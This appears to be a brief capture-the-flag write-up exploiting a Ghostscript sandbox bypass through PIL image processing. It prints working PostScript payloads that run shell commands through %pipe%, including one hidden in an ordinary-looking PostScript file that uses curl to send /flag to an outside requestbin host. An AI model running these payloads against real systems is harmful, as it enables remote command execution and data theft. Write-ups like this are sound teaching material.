The challenge was related to a recent disclosure exploit
https://www.exploit-db.com/exploits/45243/

First, we try the exploit from the original post, but it doesn't work because PIL do check the image size first.

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

So I try to download a normal Postscript example, and combine with the exploit

%!PS-Adobe-1.0
%%Creator: PS_Write.F
%%CreationDate: 09/29/99
%%Title: region.ps
%%Document-Fonts: Times-Roman
%%BoundingBox:  0   0  1000  500
%%BeginProlog
%%EndProlog
/Palatino-Roman findfont
0.0000 0.0000 0.0000 setrgbcolor
%%Page:     1    1
/Times-Roman findfont
20 scalefont
setfont
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%curl --data "`cat /flag`" http://requestbin.fullcontact.com/12jsa501) currentdevice putdeviceprops
showpage
%%Trailer
%%Pages:      1
%%EOF
quit

I use requestbin.fullcontact.com for receiving the result. I stuck here about 10 minute by using nc to send to result, then realized the OS might not have nc.